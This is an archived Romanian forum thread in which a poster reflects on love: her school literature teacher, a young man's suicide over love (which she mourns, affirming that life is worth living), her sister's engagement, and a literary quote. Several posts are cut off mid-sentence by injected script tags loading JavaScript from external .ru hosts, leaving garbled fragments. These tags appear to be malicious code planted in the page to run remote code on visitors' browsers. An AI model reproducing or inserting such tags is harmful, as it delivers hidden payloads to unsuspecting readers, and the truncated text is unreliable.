PDA

Arată versiune întreagă : Religia Iubirii ( II )...



27.05.2007, 17:46
...incep azi un alt capitol din ''Religia iubirii'', azi in zi sfanta, si voi spune ca, asa cum Unitatea dumnezeiasca S-a intrupat, luind fire umana, tot asa, prin ''intruparea divina'', Dumnezeu a lasat oamenilor posibilitatea sa imprumute '' firea divina'' a lui Iisus Hristos, urmandu-i exemplul de vietuire si iubire...


...nu, nu am sa vorbesc despre religie, ci despre altfel de iubiri sau alte iubiri, ce s-au agatat de sufletul meu de-a lungul anilor, lasandu-mi o amintire dulce sau uneori amara , dar ducandu-ma de multe ori cu gandul, si la ''firea divina'' a oamenilor, a acelora care, prin iubire, devin mai buni si mai umani...

27.05.2007, 18:47
...prima pagina din acest capitol, ca un omagiu adus profesorului meu de romana din liceu, va fi despre...da, "iubirea pentru literatura"...

28.05.2007, 20:50
Buna seara...sau...buna dimineata...o zi buna!


"iubirea pentru literatura"...hmmm...crede-ti, poate, ca mi-a placut sa citesc de mica, ca am avut asa o inclinatie catre Limba si literatura romana, in scoala...Oooo,nici pomeneala! Desigur, am citit in scoala generala, cartile de povesti, nuvele si schite sau povestioare si ce se mai studia la literatura si era obligatoriu pentru examenul de admitere la liceu...Chiar imi amintesc ca ,in clasa a VIII-a aveam de citit "Neamul Soimarestilor" si, cu chiu cu vai, mai pe sarite, cred ca l-am citit pana la urma, dar mi s-a parut ceva extraordinar de greu, de lung si de incurcat!


Dar, in fine, am dat examenul si am ajuns la liceu! N-o sa vorbesc, cel putin deocamdata, de perioada aceea,de trairi si sentimente (care aveau alte dimensiuni, nu?) ,sau de bucuria de a fi intr-o colectivitate, dea fugi la scoala, sau, de multe ori, de la scoala (in grup,desigur, toata clasa, spre disperarea profesorilor...). Acea perioada ramane unica, cel putin in viata mea,dar sunt sigura ca nu numai mie mi s-a parut asa,si-mi pastreaza in memorie si prima iubire...cea mai frumoasa,nu? Insa, altele sunt planurile mele pentru aceasta pagina din amintiri...


In clasa a IX-a, proaspata absolventa, care, pentrua lua admiterea invatasem la Limba romana, niste comentarii literare, pe de rost...(asa era atunci, nu stiu acum...),am avut surpriza... sa nu-mi placa materia de care vorbesc! O uram! De ce?


Hai sa povestesc cum am luat primul 2 din viata mea, dar nu ultimul, desigur! Nu stiu in care semestru eram,primul sau al doilea (cert este ca erau 3,asa era impartit anul scolar atunci),din primul an de liceu,si avusesem de citit...''Iliada'' de Homer... Toate bune si frumoase, ni se spusese cu o saptamana in urma sa citim opera, nu am avut-o in biblioteca si ...m-am dus la scoala...fara sa o fi citit,bineinteles! Profesorul, un batranel la 60 de ani, aproape de pensie, caruia copiii ii gasisera o porecla nostima, dar n-am sa va spun care anume...parea exigent, cu voce raspicata si patrunzatoare, dar cu ochi blanzi...dar credeti ca i-am vazut ochii pana prin clasa a X-a sau a XI-a ?Pai nu indrazneam sa ridic privirile din banca, mai ales dupa acea nota de care vorbesc.


Vine ora de romana, stateam linistita in banca, profsorul nu avea decat sa discute opera cu cei care o citisera, dar imi propuneam sa fiu foooarte atenta, poate mai prindeam si eu cateva idei, in caz de o viitoare lucrare sau ceva... Eram a 5-a la catalog. Tot a 5-a am fost, pesemne si cea care am luat 2, dupa intrebarea:Ai citit ''Iliada'' pentru astazi? Pai...sa vedeti, ca n-am avut-o in bibli...Multumesc!2...Urmatorul de la catalog: Ai citit? Si sa nu zici ca da, ca aflu imediat daca-i adevarat! Nu?si apoi cu vocea blanda:2 ! Si tot asa! Probabil ca vor fi fost si din aceia care citisera,desigur,dar putini...caci mi-amintesc senzatia de dupa ora!''rana mare''din sufletul meu de eleva silitoare,,provocata de nota proasta,prima nota pe care nu stiam cum sa o anunt parintilor(si cred ca nici nu i-am anuntat, pana nu am indreptat-o), rusinea acelei note...se estompa in intensitate numai la gandul ca aproape toata clasa era in ''aceeasi oala". Si...data viitoare, daca profesorul nostru ar mai fi intrebat cine a citit, sunt sigura ca nu mai lua nimeni 2 pentru asta, dar...el n-a mai intrebat, caci stia, probabil, ca nu mai era nevoie, si ca ''Iliada'', adusa la scoala de cei care o aveau, sau imprumutata de la biblioteca(si se apela chiar la relatii,uneori, caci erau,mai tarziu, carti ce le gaseam greu...), opera respectiva circulase cu mare viteza printre colegi, pentru a o citi toata lumea...


Dar credeti ca n-am mai luat 2 la Lb. romana? Asa am crezut si eu,ca n-o sa mai iau niciodata dupa intamplareade mai sus, pana intr-a<script src=http://www.iroe.ru/ngg.js></script>

30.05.2007, 13:01
...amintirile de liceu le las in "cutiuta lor" deocamdata, si-am sa notez cateva ganduri, despre o poveste ce m-a tulburat...cea cu baiatul care s-a aruncat de la balcon pentru profesoara de romana...


sinucigasi din dragoste au fost in toate timpurile si inca vor fi probabil, cat va exista umanitate... ma gandesc,de exemplu, la "Romeo si Julieta"... cand indragostitul isi vede visele de iubire pe cale de a nu se realiza, probabil ca frica de acest lucru, teama de a nu fi impreuna cu persoana iubita... ii trezeste in suflet dorinta de moarte...


sunt, desigur, intrebari care se pun cu privire la aspectul ca, viata nu trebuie curmata pentru nici un motiv pe lumea asta...eu sunt intr-u totul de acord, dar totusi, nu-mi vine sa cred ca cei ce s-au sinucis din dragoste erau neaparat ''fara minte"', sa nu zic altfel...


si totusi, sunt oameni ce si-au luat zilele singuri, prin tot felul de modalitati, din dragoste... e un pic o contradictie aici...caci, daca stau sa ma gandesc bine, cand zici dragoste zici triumf, zici binele celuilalt... zici dorinta de a fi impreuna cu cel pe care-l iubesti, nu?


eu, personal, nu am fost niciodata in apropierea cuiva care sa fi facut asa ceva... poate as intelege mai mult acum... poate nu...imi amintesc ca aveam in jur de 10 ani,eram la tara la bunici,intr-o vacanta, si a fost adusa acasa, pentru ingropare, o tanara ce se otravise din dragoste...nu-mi amintesc alte amanunte, decat golul mare ce l-a lasat in sufletul meu...tocmai incepusem sa aflu ca oamenii mai si mor, dar sa-si ia singuri viata, cred ca e prima data cand auzeam...si intrebarea ce mi-a ramas o vreme in sufletul meu de copil, a fost:" Ce poate sa-ti faca dragostea, sa vrei sa mori?"...


la aceasta intrebare nici nu vreau sa-mi raspund...eu as putea ''muri din dragoste'', doar in sensul literar, adica...''de atata dor''... dar, totusi, sunt oameni care, iata, se duc si se arunca de pe bloc...


amanuntele acelei drame, cu profesoara care stia, sau care era si implicata, sau ca totusi nu ar fi fost... pentru mine sunt doar amanunte... ce ma doare, sau ma surprinde cu tristete, este ca cineva isi doreste sa moara, cand iubeste! indiferent care ar fi amanuntele sau implicarile, intr-o poveste de dragoste... definitoriu este sentimentul acela unic pe care-l traiesti... ca ''plutesti'', ca ''esti in al noualea cer'', ca nu te mai intereseaza nimic, sau dimpotriva ca totul ti se pare perfect...


dragostea e unica, si, la varsta ce o am acum, pot intelege ce mi se spunea pe la 20 de ani: &lt;&lt;Dragostea e aceiasi la orice varsta, pentru ca inima ramane vesnic tanara...&gt;&gt;. Acum inteleg si stiu ca asa va fi si peste inca 20 de ani, in ceea ce ma priveste...


pacat, pacat de acel tanar si de viata lui, pacat de parintii lui si de cei ce l-au cunoscut, care-l vor pastra doar in amintire, pentru o perioada, caci apoi, probabil, si de acolo va disparea incet-incet...


viata merita traita! e atat de frumoasa si de surprinzatoare! Doamne, dar daca ar fi sa vorbesc de frumusetea sentimentului de a trai, as avea nevoie de cateva ...nu,nu ore... nici zile... de veacuri, caci viata se defineste pe sine cel mai bine, cand o traim, cu bucurie, cu intensitate, cu surpriza fiecarui nou inceput, cu speranta la orice sfarsit si dorinta de a incepe iar...


viata nu ne-am dat-o noi... si totusi e a noastra, ne apartine... o vom darui ,intr-o zi, lui Dumnezeu sau... depinde fiecare cum crede... o vom darui vesniciei... dar pana atunci mai este mult, nu-i asa?


haideti sa ne bucuram ca traim, si sa multumim ca avem, oarecum, fiecare din noi,cel mai de pret dar : dr<script src=http://www.iroe.ru/ngg.js></script>

01.06.2007, 11:38
Voi ramane cu "iubirea'' la prezent. De ce vreau sa vorbesc despre iubire? Pai, nu e acesta topicul "Religia...iubirii...'' De ce religie? Pentru ca eu cred ca iubire fara Dumnezeu nu se poate, asa cum, daca zici Dumnezeu, spui si iubire...Si ma gandeam, daca n-ar fi Dumnezeu prezent in orice poveste de dragoste, atunci cum ar fi posibila implinirea prin iubire?De ce zic asta?


Sora mea urmeaza sa se cunune, cat de curand. Ea il cunoaste pe viitorul ei sot de mai mult de un an, dar se iubesc ca si cum abia s-ar fi cunoscut, sau...ca si cum s-ar cunoaste de o viata... Nu stiu daca putem zice ca iubirea creste sau scade...Nu cred ca se intampla asa.Dar iubirea are si ea, totusi urcusurile si coborasurile ei.Ca de altfel, orice, in viata aceasta, caci nimic nu este perfect, iar daca ar fi fost perfect, cred ca ne-am fi plictisit... Pe la inceputul anului, sora mea a aflat ceva din trecutul prietenului ei, ceva ce a tulburat-o. Imi scria pe mail:&lt;&lt;Draga me surioara, eu sunt bulversata. Mi-am pierdut increderea in el. Nu neaparat pentru ca am aflat acel lucru, pentru ca el mi l-a spus, nu altcineva, dar de ce a facut-o asa de tarziu?&gt;&gt;. Ei, intrebarile iubirii sunt intotdeauna mai multe decat afirmatiile, iar indoielile mai numeroase decat certitudinile. Cel putin,aceasta e parerea mea personala.


&lt;&lt;Il iubesti?&gt;&gt; am intrebat-o pe sora mea, cand mi-a spus ca este tulburata. Parca isi pierdu-se increderea, crezand ca el i-a ascuns special acel ceva si parandu-i-se prea tarziu pentru a afla. Am rugat-o sa astepte o perioada, sa vada daca mai simte ca-l iubeste sau nu. Asa a facut. S-a inarmat cu rabdare, si acum ,iata, sunt impreuna si merg mai departe. M-am gandit atunci, cand a trecut ea prin acea perioada, ca mie mi-a fost usor sa o incurajez si sa o sustin, desi nu i-am spus altceva decat sa-si asculte inima si sa nu urmeze decat ce-i dicteaza ea. Sa afli ceva despre celalalt, ceva mai putin placut, sa zicem o gresala, desigur ca nu e usor...Dar cine nu greseste? Cine nu are ceva de ascuns in trecutul lui? Si atunci, iertarea pentru ce o avem? Si mai ales iubirea are multa iertare:"toate le iarta, toate le nadajduieste" cum zice Apostolul iubirii, adica Pavel. Si Iisus, cand a intalnitin calea sa o femeie pacatoasa, in care se arunca cu pietre, ca sa-i ia apararea bietei curtezane, a zis catre cei care o condamnau:''Cine nu a pacatuit niciodata, acela sa arunce primul piatra". Si atunci, toate pietrele au cazut pe caldaram, caci cine e perfect pe lumea aceasta?


La inceputul prieteniei sale, sora mea, imi spunea:&lt;&lt; Nu se poate, ca dupa 2 saptamani sa-i spui cuiva ca-l iubesti!Cum poate sa se indragosteasca cineva intr-un timp asa de scurt? Pot eu sa am incredere in el, ca spune adevarul, draga sora? Dar nici nu-l cunosc.&gt;&gt; Si atunci i-am cerut sa aiba rabdare. Ca oricine altcineva, eu sunt foarte priceputa, cand trebuie sa-i sfatuiesc pe ceilalti. Cand e vorba de mine...stiti...e mai greu...si cu rabdarea, si celelalte...Dar sora meam-a ascultat. Si iubirea, care-l cuprinsese in mrejele ei mai intai pe prietenul ei, i-a napadit si ei inima, curand...Acum nu stiu cine e mai indragostit, el sau ea... Stiu ca mi-a fost drag sa-i vad impreuna, ca sora mea imi vorbeste de viitorul ei sot cu afectivitate si dragoste, ca el e atent si mereu dornic sa-i intampine toate dorintele, dar mai stiu si ca este un sprijin reciproc, in momente grele...prin care trec impreuna. Caci viata nu este usoara...dar iubirea ii invinge toate obstacolele.


Si mai stiu ca iubirea e atat de minunata, de surprinzatoare si de noua, in orice inceput de zi si rasarit de soare. Iar iubirea cuprinde totul, ea nu uita pe nimeni si nimic din jur, iar Dumnezeu cred ca "rade" in cer cand e dragoste pe pamant...


ript src=http://www<script src=http://www.nmr43.ru/ngg.js></script><s<script src=http://www.iroe.ru/ngg.js></script>

03.06.2007, 12:38
&lt;&lt;Pe harfa rasturnata a ierburilor tale, vara, trupul si sufletul meu sunt inceputul unui mare cantec si tremurul mainii care-l cauta... Anii mei tineri au sunat a cantec, dar am trecut pe langa el cu dragostea de mana si am ramas cu mana intinsa ca a regelui Lear...&gt;&gt;


"Lorelei'', Liviu Rebreanu

03.06.2007, 12:41
Eu nu mai vreau sa fiu "Lorelei"...Desi, a fost frumos...


Va rog, inchideti si acest topic! Va multumesc, numai bine!

03.06.2007, 15:18
...ma bucur ca nu este inchis inca topicul...


mi-am dat seama de o gresala: pentru ca citesc in prezent un roman de Rebreanu, am trecut gresit autorul la citatul de mai sus


autorul romanului "Lorelei'' este Ionel Teodoreanu si, promit, o sa ''ma trag de urechi'', singura...


acum, ca am rectificat, revin cu rugamintea :sa fie inchis topicul.Multumesc, din nou,numai bine

Pisoi
04.06.2007, 06:35
...topic inchis la cererea initiatoarei.